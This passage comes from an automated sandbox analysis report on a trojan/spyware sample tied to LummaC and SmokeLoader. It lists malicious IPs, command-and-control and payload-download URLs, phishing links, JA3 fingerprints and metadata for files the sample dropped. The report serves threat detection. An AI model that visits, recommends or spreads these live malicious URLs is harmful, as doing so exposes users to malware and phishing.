          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1709654880.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2868395597.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2443147302.0000000006AFA000.00000004.00000020.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          77.221.157.163
          		unknownRussian Federation
          		30968INFOBOX-ASInfoboxruAutonomousSystemRUtrue
          188.114.97.3
          		foodypannyjsud.shopEuropean Union
          		13335CLOUDFLARENETUStrue
          58.151.148.90
          		gebeus.ruKorea Republic of
          		17858POWERVIS-AS-KRLGPOWERCOMMKRtrue
          185.149.100.242
          		mussangroup.comTurkey
          		209853VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLitrue
          162.159.133.233
          		cdn.discordapp.comUnited States
          		13335CLOUDFLARENETUStrue

          Private

          IP
          127.0.0.127

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1468481
          Start date and time:2024-07-06 06:15:05 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 7m 41s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:24
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:1
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:file.exe
          Detection:MAL
          Classification:mal100.troj.spyw.evad.winEXE@6/10@9/6
          EGA Information:
          • Successful, ratio: 66.7%
          HCA Information:Failed
          Cookbook Comments:
          • Found application associated with file extension: .exe

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, conhost.exe, svchost.exe, StartMenuExperienceHost.exe, mobsync.exe
          • Excluded IPs from analysis (whitelisted): 204.79.197.203
          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, r.bing.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, api-msn-com.a-0003.a-msedge.net
          • Execution Graph export aborted for target 8FDD.exe, PID 4628 because there are no executed function
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtEnumerateKey calls found.
          • Report size getting too big, too many NtEnumerateValueKey calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          00:16:00API Interceptor2170x Sleep call for process: explorer.exe modified
          00:16:38API Interceptor8x Sleep call for process: 8FDD.exe modified
          05:16:18Task SchedulerRun new task: Firefox Default Browser Agent 6EA1C999F11511CE path: C:\Users\user\AppData\Roaming\crwjtgt

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          77.221.157.163file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 77.221.157.163/systemd.exe
          188.114.97.36cd8a052498b02d1f070d36dcc6540838193d35eee101.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
          • 868920cm.nyashka.top/Lineserver.php
          http://www.telegramkv.com/Get hashmaliciousUnknownBrowse
          • www.telegramkv.com/
          MT110563270605DOC.exeGet hashmaliciousAzorultBrowse
          • hqt3.shop/HQK341/index.php
          http://cacahs.fdavm.com/Get hashmaliciousUnknownBrowse
          • cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=cpanelwhmreferral
          am.exeGet hashmaliciousAmadeyBrowse
          • downloaddining2.com/h9fmdW6/index.php
          ScanPDF_102.exeGet hashmaliciousFormBookBrowse
          • www.jjjw.xyz/ypml/
          tYEY1UeurGz0Mjb.exeGet hashmaliciousFormBookBrowse
          • www.txglobedev.com/dy13/?IR=HpLmp5lsG/78ww7PQ+32zrfZcWzFIxQC5ZchK1XnBOU/XUWwZI280oPADrvVA1p9LOCI&nL=S4247TXPfxsLR
          new order.exeGet hashmaliciousFormBookBrowse
          • www.coinwab.com/efdt/
          http://sp.26skins.com/steamstore/category/action_run_jump/?snr=1_1530_4__12Get hashmaliciousUnknownBrowse
          • sp.26skins.com/favicon.ico
          BL Draft.exeGet hashmaliciousFormBookBrowse
          • www.gazeta-ufaley.ru/wjr5/
          58.151.148.902gQsoHaGEm.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
          • dbfhns.in/tmp/index.php
          QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
          • dbfhns.in/tmp/index.php
          mJVVW85CnW.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
          • cajgtus.com/files/1/build3.exe
          a6GOcbfMde.exeGet hashmaliciousSmokeLoaderBrowse
          • nidoe.org/tmp/index.php
          oowDCOLXv5.exeGet hashmaliciousLummaC, Babuk, Djvu, RedLine, SmokeLoader, Stealc, VidarBrowse
          • brusuax.com/dl/build2.exe
          0ns5NDsgwK.exeGet hashmaliciousAmadey, SmokeLoaderBrowse
          • sjyey.com/tmp/index.php
          apeoxsTscm.exeGet hashmaliciousClipboard Hijacker, SmokeLoaderBrowse
          • sjyey.com/tmp/index.php
          file.exeGet hashmaliciousGlupteba, RedLine, SmokeLoader, Stealc, Vidar, XmrigBrowse
          • brusuax.com/dl/build2.exe
          file.exeGet hashmaliciousGlupteba, SmokeLoader, Socks5Systemz, Stealc, VidarBrowse
          • trmpc.com/check/index.php
          1eeeb5aa7dcd72a9912e8f54c60b07915d4c7fb4180c2e497483357ab9ac8640_dump.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, VidarBrowse
          • brusuax.com/dl/build2.exe

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          foodypannyjsud.shopfile.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 188.114.97.3
          92s4OjHVFf.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
          • 188.114.97.3
          mussangroup.comfile.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 185.149.100.242
          cdn.discordapp.comscript.vbsGet hashmaliciousUnknownBrowse
          • 162.159.129.233
          1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
          • 162.159.133.233
          S#U0130PAR#U0130#U015e-260624.exeGet hashmaliciousUnknownBrowse
          • 162.159.129.233
          S#U0130PAR#U0130#U015e-260624.exeGet hashmaliciousUnknownBrowse
          • 162.159.129.233
          SIPARIS-270624.exeGet hashmaliciousUnknownBrowse
          • 162.159.130.233
          SIPARIS-270624.exeGet hashmaliciousUnknownBrowse
          • 162.159.135.233
          1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
          • 162.159.133.233
          1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
          • 162.159.133.233
          https://gateway.ipfs.io/ipfs/QmTpqHPNnTfSP4qyazECwFpuNnejL7wVoR4hq9vS9pc8RPGet hashmaliciousUnknownBrowse
          • 162.159.130.233
          https://aimid.mi-china.com/Get hashmaliciousUnknownBrowse
          • 162.159.129.233
          gebeus.rufile.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 190.249.196.63

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          POWERVIS-AS-KRLGPOWERCOMMKRarm4-20240706-0012.elfGet hashmaliciousMiraiBrowse
          • 124.63.74.106
          A8j4kl6U9q.elfGet hashmaliciousMirai, MoobotBrowse
          • 125.181.42.0
          j980HN1yJw.elfGet hashmaliciousUnknownBrowse
          • 116.34.128.165
          205.185.124.50-x86-2024-07-03T23_47_55.elfGet hashmaliciousMirai, MoobotBrowse
          • 122.42.23.142
          1eMpWRaDQE.elfGet hashmaliciousUnknownBrowse
          • 49.169.117.240
          PMcyGpR57k.elfGet hashmaliciousUnknownBrowse
          • 125.241.78.106
          q9WhhN00yY.elfGet hashmaliciousUnknownBrowse
          • 119.71.158.110
          2HFh2OjMG7.elfGet hashmaliciousUnknownBrowse
          • 182.221.148.213
          d54Y7Ql8sO.elfGet hashmaliciousUnknownBrowse
          • 112.144.159.112
          c3GW14f8Ea.elfGet hashmaliciousUnknownBrowse
          • 180.229.196.83
          CLOUDFLARENETUShttp://jameshuntconstruction.comGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          6cd8a052498b02d1f070d36dcc6540838193d35eee101.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
          • 188.114.97.3
          https://rules-pear-kft5d2.mystrikingly.com/Get hashmaliciousUnknownBrowse
          • 104.17.25.14
          http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
          • 188.114.96.3
          http://services.business-manange.com/Get hashmaliciousHTMLPhisherBrowse
          • 172.67.138.117
          http://pub-2e7429ed1f544f43a4684eeceb978dbb.r2.dev/home.htmlGet hashmaliciousHTMLPhisherBrowse
          • 104.18.2.35
          http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.htmlGet hashmaliciousUnknownBrowse
          • 172.67.69.226
          https://pub-1b634168cd404e2d8bece63d5ebb4798.r2.dev/uint.html?schweissdoorsGet hashmaliciousHTMLPhisherBrowse
          • 104.18.3.35
          https://pub-9445ce0d74714d1c934c51ffcf83c3f2.r2.dev/slnt.html?nycsbsGet hashmaliciousHTMLPhisherBrowse
          • 104.18.3.35
          https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1Get hashmaliciousUnknownBrowse
          • 104.17.25.14
          VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLifile.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 185.149.100.242
          file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 185.149.100.242
          tgBNtoWqIp.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 185.149.100.122
          4TH HIRE SOA REMITTANCE_USD280,000.exeGet hashmaliciousFormBookBrowse
          • 78.142.211.199
          https://url2.mailanyone.net/scanner?m=1s7YGL-000Bzg-3S&d=4%7Cmail%2F90%2F1715854800%2F1s7YGL-000Bzg-3S%7Cin2h%7C57e1b682%7C17902772%7C12174482%7C6645DE857241AA8FBDCD2D87AE8933B9&o=%2Fphtz%3A%2Fotsmkbakntase..inromtac%2F-%2F&s=6JTyJcNMmJZPCxyEKCjyH6d3l9YGet hashmaliciousHTMLPhisherBrowse
          • 78.142.209.32
          https://za.zalo.me/v3/verifyv2/pc?token=OcNsmjfpL0XY2F3BtHzNRs4A-hhQ5q5sPXtbk3O&continue=liderlerokulu%E3%80%82com/smc/wzu/dmFsZXJpZS5wZWNyZXNzZUBpbGVkZWZyYW5jZS5mcg==$Get hashmaliciousFake CaptchaBrowse
          • 45.151.250.130
          https://za.zalo.me/v3/verifyv2/pc?token=OcNsmjfpL0XY2F3BtHzNRs4A-hhQ5q5sPXtbk3O&continue=liderlerokulu%E3%80%82com/smc/wzu/dmFsZXJpZS5wZWNyZXNzZUBpbGVkZWZyYW5jZS5mcg==$Get hashmaliciousFake CaptchaBrowse
          • 45.151.250.130
          hesaphareketi-01.pdf.exeGet hashmaliciousAgentTeslaBrowse
          • 78.142.208.142
          Hesap hareketleriniz.exeGet hashmaliciousAgentTeslaBrowse
          • 78.142.208.142
          https://api.mixpanel.com/track?data=eyJldmVudCI6ICIkY2FtcGFpZ25fbGlua19jbGljayIsICJwcm9wZXJ0aWVzIjogeyJjYW1wYWlnbl9pZCI6IDYwMTM3OTIsICJkaXN0aW5jdF9pZCI6ICJlNTQ5MGY5ZS05YWIyLTRkZWQtOGFkMi1mODMyNjdlOTNmMzEiLCAibWVzc2FnZV9pZCI6IDEzNTIyMjQsICJ0b2tlbiI6ICJiYTllYzc3MzBhMzJjMTczOTJiYjM1NjM1MGQzYTY4ZSIsICJ0eXBlIjogImVtYWlsIiwgInVybCI6ICJodHRwczovL2IueXNoLmlvLyJ9fQ==&redirect=https://seninotoaksesuar%E3%80%82com/cgi/#499840294Ymx1a2VAb3AtZi5vcmc=??4122633601028961989=Ymx1a2VAb3AtZi5vcmc=/%2e%2e=1125214171&u=276b8dda4ef94158348d5b6b8&id=6b7205781dGet hashmaliciousHTMLPhisherBrowse
          • 78.142.210.95
          CLOUDFLARENETUShttp://jameshuntconstruction.comGet hashmaliciousUnknownBrowse
          • 188.114.96.3
          6cd8a052498b02d1f070d36dcc6540838193d35eee101.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
          • 188.114.97.3
          https://rules-pear-kft5d2.mystrikingly.com/Get hashmaliciousUnknownBrowse
          • 104.17.25.14
          http://business.ifbsmetaiidentiityconfirms.com/meta-community-standard100068928266341/Get hashmaliciousHTMLPhisherBrowse
          • 188.114.96.3
          http://services.business-manange.com/Get hashmaliciousHTMLPhisherBrowse
          • 172.67.138.117
          http://pub-2e7429ed1f544f43a4684eeceb978dbb.r2.dev/home.htmlGet hashmaliciousHTMLPhisherBrowse
          • 104.18.2.35
          http://helpdesk-advertising-review-id-9865133.d3m7n55z273utf.amplifyapp.com/index.htmlGet hashmaliciousUnknownBrowse
          • 172.67.69.226
          https://pub-1b634168cd404e2d8bece63d5ebb4798.r2.dev/uint.html?schweissdoorsGet hashmaliciousHTMLPhisherBrowse
          • 104.18.3.35
          https://pub-9445ce0d74714d1c934c51ffcf83c3f2.r2.dev/slnt.html?nycsbsGet hashmaliciousHTMLPhisherBrowse
          • 104.18.3.35
          https://delivery.attempt.failure.ebbs.co.za/public/MY096OineFzTCVJ56qDw3aMDByE0CDQ1Get hashmaliciousUnknownBrowse
          • 104.17.25.14
          INFOBOX-ASInfoboxruAutonomousSystemRUfile.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 77.221.157.163
          file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 77.221.157.163
          file.exeGet hashmaliciousSmokeLoaderBrowse
          • 77.221.157.163
          file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 77.221.157.163
          file.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
          • 77.221.157.163
          5GOuTtZoQn.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
          • 77.221.157.163
          SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.15788.4670.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
          • 77.221.157.163
          Eclf71HXa1.exeGet hashmaliciousUnknownBrowse
          • 77.221.149.185
          Eclf71HXa1.exeGet hashmaliciousUnknownBrowse
          • 77.221.149.185
          file.exeGet hashmaliciousPureLog Stealer, RedLine, XmrigBrowse
          • 77.221.149.185

          JA3 Fingerprints

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
          • 188.114.97.3
          • 185.149.100.242
          • 162.159.133.233
          file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
          • 188.114.97.3
          • 185.149.100.242
          • 162.159.133.233
          file.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          • 185.149.100.242
          • 162.159.133.233
          Archivevalidv4.exeGet hashmaliciousRemcosBrowse
          • 188.114.97.3
          • 185.149.100.242
          • 162.159.133.233
          setup.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          • 185.149.100.242
          • 162.159.133.233
          https://dl.dropboxusercontent.com/scl/fi/adtf8tdt2awfvsxc7vm5b/Deutche-telekom-rechnung.zip?rlkey=j3mdg9qy4kpk2lblrj4c93bix&st=rgigszl2&dl=0Get hashmaliciousUnknownBrowse
          • 188.114.97.3
          • 185.149.100.242
          • 162.159.133.233
          E-INVOICE.xlsGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          • 185.149.100.242
          • 162.159.133.233
          6xmBUtHylU.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          • 185.149.100.242
          • 162.159.133.233
          qeUaxJCA3FO.exeGet hashmaliciousLummaCBrowse
          • 188.114.97.3
          • 185.149.100.242
          • 162.159.133.233
          hANEXOPDF.PDF40 234057.msiGet hashmaliciousUnknownBrowse
          • 188.114.97.3
          • 185.149.100.242
          • 162.159.133.233

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\8FDD.exefile.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
            file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
              file.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                file.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                  5GOuTtZoQn.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                    SecuriteInfo.com.W32.Trojan.FWF.gen.Eldorado.15788.4670.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                      JuHVfiAuLo.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                        LXbM8RbhLa.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                          EiPVv5yELP.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse
                            6IMo1kM9CC.exeGet hashmaliciousLummaC, Poverty Stealer, SmokeLoaderBrowse

                              Created / dropped Files

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_c21224191a167f50d0fc77956927dc29a8d71181_f78a65ed_51d41440-5198-4a09-8aa3-b357f99253c9\Report.wer

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):2.303574375852725
                              Encrypted:false
                              SSDEEP:384:PPC14Wbk7jAWMo+hiRichk8zuiFRY4lO8k:PPHWbk7j0o4QBhk8zuiFRY4lO8
                              MD5:F4995BD9C6A4E08C6D476DD915E19BE6
                              SHA1:C1993A97FADD6D4422470F322A3DF233B32F414E
                              SHA-256:A3BD42EAC76E80898A91A046FD7D105A1539476A9E80D55B594F1CF6597B97E4
                              SHA-512:E9ED0815172A19DC517E3E059E5135AE23DA6D32416C39B8EC93299F18A39B0F5FF060FF9B41A3232C70B7DDBB0316EC499B7D373B7CA1755AE5061CE9E744A9
                              Malicious:false
                              Reputation:low
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.7.1.3.0.2.8.9.6.1.5.6.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.1.d.4.1.4.4.0.-.5.1.9.8.-.4.a.0.9.-.8.a.a.3.-.b.3.5.7.f.9.9.2.5.3.c.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.7.5.e.8.5.2.d.-.0.8.a.6.-.4.8.4.2.-.b.6.2.1.-.d.1.6.c.f.9.c.2.0.3.d.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.1.4.-.0.0.0.1.-.0.0.1.4.-.b.6.f.7.-.2.f.3.0.4.b.c.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER14BE.tmp.WERInternalMetadata.xml

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):10836
                              Entropy (8bit):3.6952070747089776
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJdN0kI6YXnIgmfqipYpr789bEqKrurfPsm:R6lXJ30D6YXIgmfqip5EfrurfR
                              MD5:AC2AE0DCBD6B490AC5F7CBF3F2884898
                              SHA1:9FBC786EA25F5AE8CC232EC3DE897416F673487A
                              SHA-256:A6280BD3EC0B538FCB174C60A8CD6AE0F4E819FBC51411C100BEEF1196CEDBF9
                              SHA-512:CB613D2CAEA08C6D558EC88404F15C1F2CE182C2F7E1032C3C2BCBF9EC5721AB1370029CB5EBEC9DE488D9541CFD5CCC0BFF1C96A4099AF8D522FD01061CAF93
                              Malicious:false
                              Reputation:low
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.8.0.<./.P.i.

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER1655.tmp.xml

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4714
                              Entropy (8bit):4.484261684246935
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zsrrJg771I9AjWpW8VYe5Ym8M4JYTF+yq850wob9Q3jd:uIjfpI7fS7VyJRkoba3jd
                              MD5:98D1C2FBAA6CBBE387C8A666D976FB09
                              SHA1:45CE2043A70B12AFF5292ED651572FAD9B7840ED
                              SHA-256:CCA0509796B68BB378FD486F4227C6109EB2C462AE9D86ADBBE2EB868A0252A7
                              SHA-512:8910A1A7BA2C7CAF74C12A14891CE59A58C6B322447BCB1A4C90C98BA5381A1343379DC729962233A629C1514F52922548450DD48B7BC1CA24D24443E1370B3A
                              Malicious:false
                              Reputation:low
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="398599" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERFCB.tmp.dmp

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Mini DuMP crash report, 17 streams, CheckSum 0x00000004, Sat Jul 6 04:17:09 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):1075466
                              Entropy (8bit):1.3245525949565409
                              Encrypted:false
                              SSDEEP:1536:57FI/tiFPsvUbbTaWd+POVAkHxsrzHjmTy9342CSpHetgyiGv:5xI/tiJsvUbbTV+PGxHerGT2I8eyyv
                              MD5:10B758CCBE59B9AF7FFDEF96DF30C2F2
                              SHA1:3152A4121844CE7F4C09A62D98D216780471D1E4
                              SHA-256:034934FC9F9B2DBA726DDF1EB70E0BCEBD57E245043D4C54E72600FFA58A1796
                              SHA-512:C947ED8E4C7FEA34079FDAD77766D7C6E2BE924458B67F1DAE8D02131FDA5BA6C75E1AC80C9AF55EF349EF29A018AC2A6DCFB10ACEF88205F6A34B75C15FE0EB
                              Malicious:false
                              Reputation:low
                              Preview:MDMP..a..... .......E.f................ ........m..@..............................................x.......8...........T...$.......Pn......................................(...............................................................................eJ......D.......Lw......................T..............f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...............................................................................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000002d.db

                              Download File
                              Process:C:\Windows\explorer.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):108216
                              Entropy (8bit):4.005546481802011
                              Encrypted:false
                              SSDEEP:768:b7F9oInjxkCGxzOP1jk0+ACWHpfnzbNyLYduJxP7pxoZsR1v9nvnFOOmdypfR3YP:hdkFzWrJvzgxhGiwGGnS5mFwiKui6l+a
                              MD5:F052C3B4AF73D79C3AAF48349D9CB17E
                              SHA1:56F94124B79B775A54B646AB29863EEAED0432D1
                              SHA-256:49D25B84386B4C7E46C245AA9B25E9AC26F4CC2C5C588F02B5151AF3930E13EB
                              SHA-512:12CEFB1A17EEF1021AEA3B786234F13DA596B04B6A1F55257B2FB3AED8670DDEA65A3F661D861A9D2183E093C1A4D0B89634DBB357DA3BF9EC3312C2C844CA04
                              Malicious:false
                              Reputation:low
                              Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s

